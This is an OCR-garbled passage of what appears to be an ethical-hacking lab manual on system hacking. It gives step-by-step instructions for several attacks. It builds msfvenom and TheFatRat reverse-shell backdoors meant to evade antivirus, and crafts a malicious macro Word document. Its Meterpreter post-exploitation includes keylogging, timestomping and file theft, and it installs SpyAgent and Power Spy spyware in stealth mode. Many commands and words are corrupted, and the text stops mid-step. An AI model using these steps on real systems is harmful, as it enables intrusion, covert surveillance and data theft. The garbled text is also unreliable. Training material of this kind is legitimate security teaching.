11. The nest step isto start the apache server. Type the command service ‘apache start in Terminal and press Enter. 12, Now thatthe apache web server is rossing, copy Exploltexe fie ito the share folder 13, Type the command ep rootDesktopExplolt.oxe ivarhwwwihtmlishare! te mun the {nthe terminal, and press Enter. apache wob plroot mala data! exploits” Boras 14 Typemsfeonsole in the terminal and press Enter. Exploitation — [ee eas Vow Soest La Maal "el tian Gane Cah © Emride 06-ystem Hacking 15, Type use explotmultihandier and press Enter, 10 handle exploits launched outside the framework 16, Now rue the following commands in mefeonsolet 4) Type sot payload windowsimetorpreteriroverse top and press Enter. 1) Type set LMosr 10:10.10.49 and press Enter D rernenet 17. To start the handler, type the command exploit «and press Enter. 18. Now, switch to Windows 10 viral machine Run the 19. Launch Chromo, Type the URL httpe40.10.10.41isharol in the adress Eepett bar, and press enter. Note: Here #0.40.40.14 isthe IP address of Kal Linus, which may vary in your hb environment. 20, You will be reditected to the apache index webpage. Click Exploitene link to download the backdoor fie Index of shareMoride 08 ystom Nackng 21, Once the file is downloaded navigate to the download location of the brouser and double-click Explottexe fle to execute, Io this Ib the default location is Downloads folder Ez Sere my Dittyou ait reper AGU Sea Be get install 22, Ifa Open Fite - Security Waring window appears, click Rum. aa 23, Leave the Windows machine sunsing, so that Exploitexe file rons in bekground, and now switch to Kall Linux machine. P7770 interact near omenhanee ‘eis tan eva Tre ae session, you ean ‘ ‘wend sugges, many big organizations fll victim to this stack vector. The atackers ‘Terme tick the staff of @ workplace to dick links in a legitimate looking document which meee, ‘turns out to be malicious and even able to evade the antivvinss programmes, In this lab we shall ind out how to create @ malicious office document sod get 2 D wastes vee meterpretr shel by bypasingan-vitos systems, Lab Objectives “The objective ofthis ab is to hetp students ea 1 How w te an ofce document in expat windows machine? Lab Environment toot demonstrated in T9Canyoutthis lb, ou neat: ‘in ab are + computer rinsing Windows Server 2016 ern. + Kall Line runing. vital machine ‘Tootncenvto + WindowsServer 2012 mnning a viral machine Modul 06 System Hacking Lab Duration “ime: 15 Minates na MeaMote 08: Sytem Mocking Overview of TheFatRat The Patt provides an easy way to rete backdoors and payloads which can bypass set adv systems, Lab Tasks 1. Log into the Kalé Linx machine ane open 4 Terminal windows. Type ot ‘clone hltpssithub.com'ScrectnecTheF aft 20! hi Eta. Borasxs ‘Set Up ThoFatRat [Note:"ThefatRat is already preinstalled i the Kali Linx machin, ou can skip w step 8 2. Aferthe doring is completed, type ed ThaFatat snd hit Entor 3. Type chmod -R 755 kootTeFatRat and hit Enter as shown in the scrcashot Tae TroMeda 06- Syst Hacking 4. Type Jaetuph anc hie Enter to begin the iestaltion as show in the seroershot 5, An UPDATING KALI REPO popup appears as shown inthe sccensbot. Let it Sich updating the lal packages UPDATING KALI REPO 6, After che update window doses, ThelatRet asks to ceate a shoncutin the system. Type yand hit enter TRU FIR oooMoe 06- Sst Hacking A Wearing appents as shown in the scteenshot. Hit Enter to continue TeRBIa “Thera Fie Esk Vaw Seach Terminal Help TEOTIEe TB Afertheinsalltion is complete inthe Terminal window ype fatrat and hit ie, Enter. Make Backdoor Fle BG FaMose 08: Sytem Mache 9, BatRat launches and stars to verily the installed dependencies a shown in the seeenshot RTT 10. Service Running messages comes on the screen 2s shown in the screenshot Press Enter to contin 11, You wil get mulkinle romps saying prose Entor to continua, do $0 Ghia Maa Pac Tied Taig mcs Cl wmMeade 06- Stem Hacng 12, TheFatRat menu comesas shown in the screenshot. Choose 6] Greate Fad Backsoor 1000% with PwnWinds [Excelent] by typing 6 in the menu and it Ener,Moto 08 ystom Hacking 13, PynlWinds menu appeursas shown inthe sereenshot: Choos [3] Create oxo flo with apache + Powershell (FUD 100%) by tying 3 inthe mena and hit Tear Toe Fie Fat View Seren Terma Hep 14, "Type 10:40:40444 in the Sat LHOST IP option and it Enterride 06-ystem Hacking 15, Inthe Set LPOR option, type 444 ac hit Enter, 16. Type payload in ‘Please enter the base name for output les’ otion and It Entoras shown inthe Screenshot. 17 In the Choose Payload option, choos 3 windowaimetorpretedreverse top by sping Sand hit Enter eomcmns Cp By EEesto 06-Syatom Hocking 18, "The Fatfat generates peloadexe file located at Home/TheFatfatioutput as shownin the screenshot mint TETAER 18. Nowtogo luck wo amin menu choose [6 Back to menu by ying Band hie Make Malicious see Word ite TRROIaE AFAR Ooesto 06-Syatom Hocking 20, From the mens, choose (07] Greate Backdoor For Office with MlcrosploKt by typing 7 and hit Enter a shown in the sereenshas. TaSiaE TPE iia ing Canin CE weMode 06 System Hacking 2, Microsploicmenu appears choose option fa| Te Microsoft Office Macro on Windows by typing 2nd hit Ener. TeeGate 22. “Type 40.40.40.4 in the Set LMOST I option and hit Enter 23, Inthe Set LPORT option, type 444 and hit Ener. wa Tied kings Gus Ch EmaMele 06- System Hachng 24, Type BadDee in the Enter the base name for output Ries option a hit Enter as shown inthe Sereeoshot 25, In Enter the message for the document body (ENTER = default) type you have boon hackedt and hic Entar.Moc 08. stom Machng 26, In Are u want Use custom exe file backdeor (yn) option spe y and hit Enter 27. Type root The Fathatioutputipayload.exe 2s Path an hit Enter. 28 lo the Choose Payload option, choose 3 windowalmeterproterreverse top by tying, 3 ad hit Enter. teae 06 Sytem Hocking 29, ‘The malicious document tills appear as shown inthe seeenshot Hit Enter 30. Navigate 1 HomerTheFatRatioutput t0 find che genemted word fle at shown inthe screenshot rita Mena Pe Tica ation Gnas Cop OEEMote 06 Sytem Mecho S31. Open another terminal window and launch metapit by eying mafconsote sd hit Ener. ‘Set Upa Listener Eat saw Botaen a 33. Type set payload windowsimeterperterreverse tep and hit Enter as shown inthe sereenshot,to 08- ystom Mackng 34, Type Sot LMOST 10.10.10.11 and hit Ener, ype sot LPORT 4444 and hit Entor ad finally type show options and it Enter. Ta Toe] 35, Now ype am and it Enter to sat the tenet “Birr s 34 Now open another terminal window and ype ep. ee ‘root/TheFatRatoutputtBadDoc.docm iartwwwihtmlshare! el ht Ente. Share tho ‘Ca Ml Pa "ii stg Goren gm eaMote 08 System Hecking 37. Then ype service apached start od hit Ente, 38. Now swith to Windows Server 2012 sytem and open a browser (ere Internet Explorer. 39, tn the addees bar type netpano.40.4 40, lodex of /shae page appexts, click SadDecatoem to dolla it 41, Click Save inthe dawnload prompe ss shown the screenshot. sare! a the URILand hit Enter Malicious Document | Index of /share Sant Lato Se san PS cncmes a = Taig Ge (gr tdMode 06 Sytem Mockeg 42. Open your Downloads folder and denble lick the word fle dnenoaded in the previous sep, +9 [ener a = a — aie ry = 43, MS Word opens he Sle in Protected View, Clee Enable Eating a shown in the screenshot ORE ToR aang ni “Gitta Mend hess —~~C~CS~*~*~*S*SCSCSCSC Cem ae Oy ‘Mies tocvet Roda sh PotsMovie 08- ystem Nackng 4A Scoutty Wamingg appears, click Enable Content as shown. in. the sereenshot own dunn cel stata os 45. Now ifyou such back othe Kall Lie sysem, yo wil nl dat we have {AMotorpreter session open cod inthe metasploit terminal, 46, "Type Sosstons 4 and hic Entor to sce all he active cesions ar shown in the screenshot. SEH a anal Pe "ela Hann Coenen Cam nace Rope Se tedMode 06 System Hocking 47, Type sessions 14 and bit enter to get meterpreter command line a shown inthe sreenshoe 48 Type sysinfo and hit Enter to view the system details of the exploited computer as shown in the screens. Doran? View Exploited ‘System Details Lab Analysis Analyze and document the results dard w the ab exercise Tntemet Connection Required Yes No Platform Supported Classroom Ditabs GLa Man "hic Hating and Guiomar Capra O mHMode 06 Sytem aching Hacking Windows 10 using Metasploit and Post-Exploitation using Meterpreter Metaspleit Framework: is a tool for developing and exacting expt cade against a rote tars machine Lab Scenario 2 Vite Backdoor ae malicious fs that contain Trojan or other infectious applications Ines _ har ean ether halt the curent working state of a target machine of even gain 7 oxyar —_partal/complete cootrol over it. Attackers build auch backdoors ia attempt to lacsisie gain remote acces 1 the vietin machines, They send these backdoors through rte0te demonstrated in ‘hi nb are ‘avaliable in Module 06. Systom Hacking CaaS Mal Pe ‘email, file-sharing web applications, shared neswork drives, among others, and ‘entice the users to execute them, Once a user exceutes such application, an antacker can gui access to his/her afected machine and perform aesvitis such askeylogging, senstive data extraction, and so on, which can incur severe damage to the affected user. Lab Objectives “The objective ofthis lab isto help students learn to deteet Trojan and backdoor attacks “The objectives ofthis lb ince: 1 Creating server and testing the network for attack. 1 Auacking network using «sample baelloae and monitor system activityMovie 06- ystem Mackng Lab Environment “To cany this out, you neal: Kali Linax running in Views machine Windows 10 running in viewal machine (Vixim machine) + Aweb browser with Internet access 1 Administnsive prvaeges to mn tok Lab Duration Overview of the Lab “Teojan & a program that contains a malicious or harmful code ieside apparently harmless programming or data in such a way that it ean get control and eause damage, such as mining the fle allocation table on a hard dive Lab Tasks [Note: Make sare to dnable Windows SmartScreen ind Windows Defender in Windows 10 Bmotaspon 1, Before bepianing this kb, create a ut file named seeretixt on the Frameworks Windows 10 virual machine; write something in it and save it io the So fecentrie location €AUsers\Admin\Downlonds, ‘plat coae 2. In thislab, the secret ile contains the text “My credit eard account ‘painata romote rmumbor le 123456709.” 3. Log in © Kall Linu virtual machine 4. Launch a Command line terminal “Sisietoned Romandnt sa RetMovie 08- ystem Nackng ‘ype the command mafvenom -p windowsimeterpreterireverse top ~ platform windows -a 386-2 x8G/ahikata ga nat -b "x00" LHOST=10.10.10.14 4 exe > Desitop/Backdoorane and press Ente. 6. “This creates a backdoor on the Desktop. — 7. Now you neal to shate Backdoorexe with the victim machine (i this Lb, windows 10 i se vicim machin). 8. "To sherethe file, you need t start the apache server. ‘Type the command service apached start in Terminal, and press Enter. 9. Now the apuche web server is running, copy Backdeer.exe into the share folder. ‘Gt tab Mana Poe elation Copy amMoa 05: Sytem Hacking 10, Type ep hoetDesktop! Backioor.exe Wvariwwwitmllsharel znd press Enter 11. Now, ‘ype the command mateonsol smsfeontole and press Enter to launch 12, Type use explottimuttinandier aod press Enter, co handle exploits Inunched outside the framework Drogen Dsermem to BGI ig i ine ita Mal Tied ating Gxmenmcnins Co Oy HamedModto 06 ystom Hachng 13, Now, issue the following commands in msfeonsole: 2) Type set payload windowsimeterpretertreverse.tep and press 1) Type set LMOST 40.10.4014 and press Enter. 9) Type show options zed press Enter. Thislets you know the listening port,Mode 08- System Mackng Trnee td 15.Togontothemindows #0 vim michine 16, Launch Fteox or anyweb bowser, and spe htt.40:10.4/ahared neve inthe URL. fi then press Enter [Backdoor Fle ‘Note:40.10.10.41 isthe IP address of Kall Linux, which may vary in your lab environment 17, Click the Mackoorsene ink to download the backdoor fle, 18. The Opening ‘Note: Make sure both the Backdoorexe and secretsxt fs are inthe same directory. yekdoor.exe pop-up appears click Save File, (Opening Bckaooro ‘ou hve chosen to ope FF Backdoorene Cttyou dirt have apache? hich i Biman File 72.1 KB) Installed, run apt- ‘rom: hp /10103051 ‘ot install apache Would youtbeto savethis fle? 19, By defauly, thie i is stored in GAUsere\Admin\Downloads, GitiiatMtimal ye) —~—~SC*~*~*~*SCSCSCSC aga Cn aie Sy agp hnel aprile whe PetModule 08 ystem Hacking 20, On completion of download, « download notation appears in the browser. Click Open Containing Folder 21, Double-click Backdoorexe. Ifan Open Fi sppeas, lick Ru Security Warning 22, Switch back to the Kal Linux machine. Metespreter session hus been successfully opened as shown in the following sercenshot:Mode 08- System Mackng Sona 23, Type sessions and press Enter to view the active sessions, — aia eetabisha pie esx vor sons Tend Heb ‘Seation and 24, Type sessions +1 and press Enter (1 in sessions 44 command is the id number ofthe session). Materpreter shells launched as shown in the following screenshotMatto 06 Syetom Hacking 25, Type ysinfo and press Enter. Issuing this command displays tanjet machine information such as computer name, operating system, and x0 26, Type ipconfig snl press Enter. This displays the victim machine's IP sxldress, MAC adress, and #0 00. Pa "i ang ars yh bandMote 08: System Hacking 27, Type getuid and press Enter, 28, Running getid wil display the stacker thatthe Meserpreter server is running as administrator on the host. Brace a 29, Type pwd and press Enter to view the current working directory on the st alt the Files in remot (axge?) machine ‘2 Directory Note: ‘The current working ditecory will differ according t0 where you have saved the Backdoorex fl, therefore the screenshots might differ fn your lab eevironment. ~~ oe > 30, Type te and press Enter to list the fs inthe current working directory ‘Note: ‘The serceashots might differ in your lab environment. 31. To read the contents of tex file, type eat Mloname.txt (here, secrottet) aa and press Enter. rita Maal Tic Hating sd Gummo Copa HOE Tait horel Ryscnete sy PoseMatto 06 Syetom Hacking 52, Change the MACE ausibutes of secretxe, Brasxs 33, While performing post exploitation aetvtis, a hacker reso acces files View the MACE © read thei contents, Upon doing so, he MACE atuibuts change ames ‘mmatste, which gives an indinion to the fle wser/onmer tht someone has ead oF mode he fformation, 34. To eavenohintof these MACE arbutes, use the times tmp command to change the atinbutes ss you wih ater accesing He. 35, To view the mace atebtes of soeretent, ype timestomp secret. -v snd press Enter. This displays the crewed une, accessed tine, modied ‘ime, are eney modified time, as shown in the cereeshor Tirasx 7 36. The ed command changes the present working director. As you know, ‘he curent working directory is C:Usora\Student.Dowmlond ‘Change the See PreaentWorting 37. Type ed ito change the curent emote directory to Gx Directory WO} settee tee ae ee aaa Changed Directory 38, Now type pw and press Enter. 38, Observe thatthe curent remote directory has changed 9 2 SE oso)ose 08-ystem Hacking 40, "Type tsand press Enter to list the files inthe current working directory es. Sere 41. The download command downloads a file from the remote machine Downlond.a Filo 42. Type download filenameextension (a this ab, dotnetbuexe) 2nd Gin Lat Na a eng arenes CO EaMadde 06- atom Macng 43, The downloaded files stored in the Nome Folder by default. Click Places, sd click Home. +44. "The downloaded file is avalable in the home folder as shown in the following screenshot 45. The search command helps you locate Ges on the vitim machine. "The command is capable of searching through the whole system or specific folders 46. ‘Type search floname.ext” (here pagotio.sys) and press Enter. oo Pas Taig nsModule 06: ystem Mackng 47. Type keysean start and press Enter. This starts capturing all keyboard input fom the victim system. 48, Switch back to the Windows 10 machine, create a text file and start, ‘yping something. Fe estar tmioraet pel iene 49, Switch to the Kali Linux machine, Type keyeean.dump end press [Enter ‘Ths dumps all the keystrokes. 50, Type idletime and press Enter Si, Irs this command displays the number of seconds for which the ‘ser a been idle on the remote system, 52 You may shutdown the vietin machine after performing post exploitation, Tile Wading nd Gomes Coie Oy Ewe TEighedomenl epeeNeato 08 System Hacking 53, Type shutdown and press Entor. This shuts down the vietim machine Lab Analysis, Acalyzeand dacment te rent tc ta this lb exerci Provide your opinion of your ets weourty posture and exposure through publ an fe information. Intemet Connection Required No Bitabs Tai anges Gomes Spek Oy eatak Mee Ba Madde 06- yatom Macng User System Monitoring and Surveillance using Spytech SpyAgent Spytech SpyAgent is a powerfl computer spy software that allows you to monitor caeything mere doom a compater—in total cea. SpyAent provides a larg array off esential computer monitoring features, as well as website, application, and chat- lent Wockng, ck sbedling, and remate dey ofl via mal r FTP. Lab Scenario Tava, employees are given acces to 4 wie aay of decronic communication espipmene ral inant merging bal postioing stems telephone sytem tar vdeo camera have gen employes new waye 10 onic de contact and performance of their employees, Many employees are provided with « lapeop Ecmputer and mobde phone they can take home and oe or business ontsie the Wwrkplace. Whether an employee an rexonably expect privacy when wing such ompany-uppld equipment depends, ia luge par, od te scanty poy the employer has pun place and made koown to enplojes In this bb, we expin the process of moitotng employee aces using Spec SprAgen. Lab Objectives ‘The objective of this lab is to help stodents ase Spytech and SpyAgent, After completing this ab, stadents wil be able = Tnwalland configure Spytech SpyAgont i victim machine Monitor keysuoles typed, websites vised and Inert Tmffc Dats go omensFrreote ‘demonstrated in ‘his nb are ace. ‘TookiceHvio Module 08 System Hacking Mola 08 yatom Hacking Lab Environment “To perform this ab, you nec: A computer runsing Windows Server 2016 * Run this toon Windows Server 2012(sctim machine) + Or,download Spytech SpyAgent at htpuiwwnspytect> ‘wob.comspyagentshtm! * Ifyou with to download the atest version, sreenshots may der 1 Aciministntve prviloges to instal andl ran tools Lab Duration Overview of the Lab This hb demonsntesostxets how betas rem desitop connection wih 1 yidin machine and nang open aamel Spygate ey tack omc 1. Thisab works onl the tet machines Tamed 2. Since you have seen how to escalate paivileges in the ear lab (Escalating Privileges by Exploting Client Side Vulneabites), you wll use the same technique t escalate pivileges and then dump the password hashes, 3. On obtsining the hashes, you will we password cracking application such as ‘Rainbow Crack to obtain pin text passwords, 4. Once you have the passwords handy, you will establish a Remate Desktop ‘Connection a an attacker, inal Spytech Spygent and leave iin steatth mode [Note In this ki, you ate connecting remotely to Windows server 212 vitrual machine, You cat establish remote connection only fora esc acount that has ‘adminiswativeprveges (here, dasom weer account has adminisrative preps, sowe dal be logingin to), 5. "The next task would be to log oto virtual machine sa leyimate ser (hee you) and perform user activites withoue being aware of the application teacking your activites in background 6. Once done, you will again establish 2 Remote Desktop Connection 25 a1 attacker, bring the application out of stealth mode, and monitor de actives ‘performed on the virtual machine by the wetim (you). ‘igo GnomeMode 06 System Hacking Lab Tasks Brasrs 1, Loginto the Windows Server 2046 machine and clic the Search icon from mamas the taskbar, Romote Desktop Connection ee 2 Inthe Search Geli, search for Remote Desktop Connection 3. ick Remote Desktop Connection inthe Search resus. Gita Meme "ied Hating Gusormrrone Coprah HamMode 06 Sytem Hacking 4, The Romote Desktop Connection window opeos. Enter dhe IP address of Windows Server 2012 (in this lab, 0.40.10: which might differ in your Jub environment in the Computer fc, and cick Show Options, 1 fereteDettop Connection | Remote Desktop ) Connection (POURS ag ne Coc 5, Totera uscname gated alminseasve pivges (re, Jason) and eck connect. 1 fects DensayCoonecbon - Remote Desktop ») Connection Gone |Diay Lac Feescet genes Abared Login trae By Sieh rectt nme come seme isowneta ane once Cernecton roe Sethe cart cemacten wg tan ROP ear pen 2 Soe Gata Maal Tieton opmen eS eeeodto 06 Systom Hacking 6. The host machine ies to ewablish a Remote connection with the get sachine, 7. ‘Aetna Secu pop-p ppat ehe pwc wert) ic coer Enter your credentials “These credentals wil be wed Yo connect o 10.10.1012, 8. A Remote Desktop Connection window appears dick Yes. There conpe cote mtbr int pins ws ‘ry esese fmm be ut ocend etfs rane ane inh sntetomtn e ctee WNOWGTOIEPA CEH: tens eroe Thefolowng pr woe enone nh ala eee Beet ceeze (By Tecate om staked ct my Do jeuetto cme dete thse catheter? Sa Maal Pe Tic sigan Gammon Consigh Oy HOE Eiigetomeal epectone ctorMode 06 Sytem Hacking "Note: You camot access a Remote Desktop Connection if the target machine shut down, Remote Desktop Connection is posible oly if the machine isin turned ON. 9, A.Remote Desktop connection is succesfully established, as shown in the sin ACCRA ee “GiiahMtnad hee —~SCS*~*~*S*SCSCSSC* RN gn Oy EEN Miagpe nana pede Sey Poon12.IF dhe Cannot access network resource dialog box appear, enter the RES Cte cme en 13. The Spytech SpyAgent Setup window appears; ick Nomt eo 4 SpyAgent Dee nee CUM pgsapee ‘e Mena Pie? Mitac soweetpeesne sc st06 peter Hacking 14, The welcome wizan! of Spytech SpyAgent Setup program window spears read the instructions and cick Mest ‘dene na euch Spat Satp pen Te pana ea Site Sope nyan ore it ecshen oer aioe ceean foe ‘WaRNn: he pon pound y copia ed earned Unadhaatteaetn a hth yan itmintre td ngs ato pode 15. The Important Notes wizard appear; read the now an click Went. “GMa SOSCS~*~*~*~*~*”*C id emo Cah Bm Mii Rene peenons Sec ete‘Mod 06. stom Mocking 16 The Sofware Liconso Agroomont window appens, you need to accept the sgreament to instal Spyrech Spy 17, Soyelidk Yes to continue, ‘ites Agenar ste FASE ODN eee te Dosey cal tem hacia Lee Agena? chee Spr co To ‘oul Aescasn sours seat aaenan fs oe EE = | aaa 18, choose Dostation Location window apa eit the deo tinal SprechSpyteen. 19, Click Next to continue instalation, Seapine Senet nile dnc D sesindide ie Totem soar ch Nee some ete Soo Toto a etc ce Bro ed det ra siete ‘Yalanchanerate nl Safech Soy inact seicincone tet Deana oa [EER OO ATTOMOOUE STENT [te] Stones SOF cone Cie) _ toes GLE ae ete Eiigectocral bywaabossene Pete1D span taming Sedans te Seen ‘Siuetacuay Drag toctnne oreeeene vce Sinont nt a0" prc Ga Mana 9 Mode 06 System Hocking 20, The Select SpyAgont inatatation Type window appews; sdlece the ‘AdministratonTester sep ype. 21, Click Next. Coke beeesenoyeu me anc at (7 TernaaTions) anne nie re see cee een ooamerts we rales i © stosnisten Regan tle meget tia "HGS lone 22, The Ready to Install window appears; click Next to start installing Spytech SpyAgent Seugrauhat esha atte Seth Spot oe ev chaste errs "ie ating Gunes Cara SKE ame ‘itor kel Rept Sey PeMotte 08 Sytem aching 2A The Spytech SpyAgent Setup didog-box prompts you w indude an ‘uninstaller, click Yes. © visti mitt 24, A Spytoch Spyagent widow appear; etose the window. =o} +] [aaa — FIGURE Sp Soy wh Giiiiah tind Pee ~~SC~C~*~*S*CSCSTSTSC* ms ey "hie taorel Ren Sey PeeMote 08 Sytem Haching 25, ‘The A NOTICE FOR ANTIVIRUS USERS window appear; read the notice, and click Nest. 26. "The Finiahed window appears; uncheck View Help Documentation, and dick etose wo end the sex. Sug cng wd Steck Shapiro aed rinse ek chiocnte Sp on CE) “Giliatiimad ie SC ng dc Co Rings Rapin sey tedModi 06- Bytom Hacking 27. "The Spytoch SpyAgent dialog box appears click Continue... e SpyAgent Su eee eames, ‘F Spvagert he tel pads as ure ae wal eee ene ease ee on Row ya ean ran REge WISE opandd e yas tab teower FIGURE 2p Spree 28, Step of setup wizanl appears click elk to continue. eee Cee Cec oey) D spe nanos Peer ereneuere een neers "at tame fpmeneeaee icone Peoeer eae te |e SA 29, Kote password inthe New Password eld, and resp the same password inthe Confirm field. “Gattat Mena hess ——~SCSCSCSCSCSCSCSSSSC i Cnres Case Oy Mine Roweet pclae Secs aeMote08. Sytem aching Note; Here, the password entered is qwerty@t23 30, Giek ox, 31, The password changed pop-p appears click OR Ba sro rest ten ce nae GURE 92 pred ese 32, Stop 2 of Weleome wizard appents, lick eck to continuon. TURE 25 Sp 70k Whe ‘Ge Tab Mana Pe aoa Hangand Gunemanons Copii OD "Exjpctowval pnctoes waay aes“Bras Mote 06-Sytem Hacking 33, The Configuration section of setup wizard appears click the Complete + ‘Stealth Configuration ralio button, and cick Ment, AGING nc 34, "The Extras section of setup wizard appears check Leadon Windows StartupMode 6 Sytem Hacking 35, "The Confirm Settings ction of setup wizard appears; dick Next to OUR: Colon eg ei 36, The Apply section of sep wizand appears click Net FIGURE 929. Aye) ‘GE Tab Mal Pass “itso eposetce ase atspp statin D spapetatnne Module 08 ystem Hacking 37. The Finished winslow appears click Finish ro successflly setup SpyAgert scortgusten Configuration Finishes! 3. Confem Settings ante spycam Aoely a 38, The main window of SpyAgent appears along wth Step 3.0F emp wizard 39, Click Click te continue. Ret ere “Gites et —~SSCSCSCS*S*C*SCSCSSC gad Cem are ly ‘Rta Maal ee tbc ted Rope rae‘Start Monitoring A spss on Salone Mole 06-yst Hachng 40, Ifa Getting Started dslg- box appess lik No, 4, ‘To tack the general wer activites, click Start Monitoring, a. 2] ae 42, The Enter Access Password window appears enter the password yo ‘peti i stop 34 inthis ab, qwortyan.23) and click OK. == CE) 4, ‘The Stealth Notiee window appear; rea the instructions and dick OK, ‘Note: To bring Spygent out of stealth mode, press Ctst+Shift AIM, ‘pigtinen prgiocayinnayes soaMot 06 Sytem Hacking “44, A SpyAgent pop-up appears. Check Bo not shaw this Help Tip again and ‘Do not show Related Help Tips like this again click elie to continue. 3 TaN NellaNG first time usage ips and help Peary Ar Ree ee oS ‘Stabe nt Sere Sea enero eee your password. To view logs now, chick on the Se derma Sppropriate fog viewer. 45, Clos: the Remote Desktop Connection. 46, Now Logonto the Windows Server 2012 virtual machine's Jason account sea legitimate user (assume you ae acting as Wt). “47 Bows the Intemet anything) or perform any user activity nn CS] See SC gd Commemcms ga iar Rore penton smtp oeMote 08 System Hacking 48. Now, switch back wo the host machine, and pesform steps 4-8 10 lunch Remote Desktop Connection, (jou ate loging into the machine as an attacker} 48," bring SpyAgent out of steath mode, press CArl+ShiRoAIo 50. Spyagent wll ask fo an Access Password qwerty@t23);ctcriand cick OK.Mose 08. Sytem Macken 51, To check user keystrokes ftom keyboard, lick Keyboard & Mouse on —Girasne ‘the SpyAgent GUI. Monitor User 52, Select View Keystrokes Log, Bre) ) 53. A list of keystrokes log enties is displayed. Select an application whose Jog entries you want 10 view. Here, bank account details have been viewed. [Note: Ifa User Account Control pop-up appears asking you to disable the UAC, click Yes, 54, SpyAgene displays all the resultant keystrokes for the selected application, ‘© shown in sereenshot : nen Raced Rohn Sy RaeMode 06 System Hocking 55, To cheek the websites vised by the user, click Website Usage, 56, Select View Websites Logged. sereenthot " ° ‘tateMoto 08 System Hacking 58, In the sume way, you can seleet each tile view all the activites, 59, Once you ate finished, ase the remote desktop connection. 60, ‘This way, even an stacker can hack into a machine and install SpyAgent «0 spy on all acivies performed by a user on his/her system. Lab Analysis. Aras and document the rents ated otis exer. oid your opision tegeag yor tgeds meh poe al capo ALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS EINo Ditabs ‘GaN a Mem 8Mea 06- Sytem Hocking Web Activity Monitoring and Recording using Power Spy Pover Spy sofare abla you to seretly monitor and rend all adits on your canaputer, bic is comply hgah Lab Scenario 7 awe New technologies alow employer to check whether employers ae wasig ine at Jstamiiat recreational Web sites or sending unprofesional email, At the ste time, 7 texyar ——_ofitions shuld be ase of oe 30 that ie gimate busines ite —terwisie do aot become an unacceptable invasion of worker privacy. Before deploying an BL waaeie employee monitoring program, you sbould canfy the terms of acepeable and Senopabirun epee een Sate eel Lees al ery Bi vesinotsce Compttenive crpable we ply (AUP that iT mu ages tn. Tht ih we expen choctntcodog elo ace log Pare Sp Lab Objectives “The objeve ofthis Ib isto help stdens ue the Aciviy Most wo, Afr completing sab sade wl be sl 1+ ostaland confgte Power Spy + Monitor kstokes typed webs vist, nd lteme Tale Data Lab Environment “Toparforn the, youn A computer unaing Windows Server 2016 A computer running WindowsServer 2012 inal machine (vet machine) You can download the Power Spy tool from ntepsimacematrinsf-comidonnload php?e:powerspy software '+ Ifyou wish to download the latest version, screenshots may differ + Administsive privilege to install nd run tools Gata Mana Pes Tc nig Gomme Copa ‘iRairhocrel Ropeancon sey tedMore 06- Syste Hacking Lab Duration “Tine 15 Mines Overview of the Lab [hveeraeeuny Ths Mbceocenis to stlents how to eal emote dedi connection wth eset isin mdi adn ower Spy mse cheer epeerrmemas |, Ths work oni tert machine i ume OW errowerarr 2. As you have seen how to exalt preys inthe er bb (seg mas Privileges by Exploiting Client Side Vulnerabliies), you will use the same techie calcula td en amp the prot 31. Ou cheng the lashes, youl me powered cxcking wpliaion ech ex TashowCck chan aa text pasts 4 ace youl th asec Enc, ou wl ish «Ra Deo onmocton i ann val Pow Sy an kave tn stan mode, [Nat fish, yo ae comncing remota Wins server 202 ial tmadine You cublah tui couneson ony bea wer sont gcd “imitate pgs (se, Jeon has ade pag). 5, ‘The net tak willbe to log ox the wun machine 2 ja se di cam, you) al Peso wit cra ibe bay rete Of ‘pple wacky you sos 6. Having die you wl kn bi «Reet Deahp Comes to atone, big the apkatin ot of sath dg a mono oe tcintio potomel on vital mache by tevin) Lab Tasks -_ In the Windows Server 2016 machine, ick the Search ian in the taba to open the search menMore 08-ystrn Hacking 2 3 Hove, search for Remote Desktop Connection, Click Remote Desktop Connection in the Search field, "The Remexe Desktop Connection window appears; eter the IP aleess of ‘Windows Server 2042 (inthis hb, 10.40.40.12, which might differ in your Lsbenviroament inthe Computer fei, and click Show Option, WS Remote Dest Connection Remote Desktop ») Connection Lsernane: Newsnet Coa ign Gomera Cn Oh "EiGakowvel upset stay edMode 06- Stem Mackng 5, Enter uscename whose account has administrative prleges (here, don), oe Oily LatAm peice Ader Lenn stroe Lay Pirro cr conte [i a —— EJ) Daewrtosae sete IGINWe Hg ReneeDetn Comes 6, The host machine ties to exsblsh « Remote connection with the target smachine 7. Avindows Security pop-up appears enter the password (qwerty) an cick ox. Enter your credentials Gitta Nam Tia ttng ae Grameen Corey Km “ith towrel ey PoeMode 08- System Mackng 8, A Remote Desktop Connection window appears cick Ves, RGU Ms aD Comer Note: You cansot acerss a Remote Deskiop Connection ifthe target machine is shutdowm, TA pasion the machin isi tron 9. A Remote Desktop connection is successflly stable, as shown in the ‘Get Tab Mana PyeInstall Power Spy 2014 ‘Gab Namal Pa Motto 06-Systom Hacking 10, Close the Server Manager wisdow. 11, Navigate to ZACEH-TooleICEH10 Module 06 System Hacking Spyware\Genoral Spyware Powor Spy. 12 Double-click setupane, 13, Ifthe Open Fle - Securty Waring pop-up appears, click Rum 14, Fellow the instaltion spt instal Pose Spy. 15, On completing the installation, dhe Rum as Administrator window appear; ick Rum, 16."The Setup Login Password window appears; enter the password (qworty@123) inthe New password and Confirm password fells. 17, Click Suet Se ele esol] PICURE 1o-Senpagn pane iil Nang nd Ganesan Capra OW TiiiiaRoerel Rpwseto sacMout 08- Sytem aching 18. The Welcome Te Power Spy Control Panell webpage appears in the default browser, Close the browser, D swote ‘Souter apace pele Get Siren any eps RG 0 Wee one Cen at eg 19, Ifthe Microsoft Phishing Fitor pop-up appears, select Ask me lator and click Ox. Pease ot eee as ce eo vers chte @ © Turmon automatic Pshing Fer recommended) Sere vebete scat nlbeset Megat abe ches omaton ‘Sipvedea reread topes ere a FC Turmottautomate misting Hter sir eterna oer cat we a eee ‘NT aa Da "el tigen Grane Caer by Em ‘iMesh necting Ss Patt‘Citta Mons Pee Moa 06 Sytom Hacking 20, The Information dialog box appears on the Sewp login password AR 1 rand be 21, The Enter login password window appears; enter the passwon! (which you set step 22, Click submit, encaeeiy: "NGURE LN tea Hoa aa nse op hons ap Pateoto 06-ystom Hacking 23, The Registor product window appear; click on Later to continue. D senate er nee GUN 10 gir pan wn 24, The main window of Power Spy opens as shown below. ED nassciern ‘CLAS Manat a2 Til ang nd Gone Copa 7 8 Gm “Ekeckcewe trosetor aceDraex Diag vir cca echo odto 06- Sytem Hacking 25, Click on Start Monitoring, 26, Ifthe System Reboot Recommended window appears, click OK. Click on Stealth Mode (salth mode runs the Power spy completely invisibly on the computes). 28, The 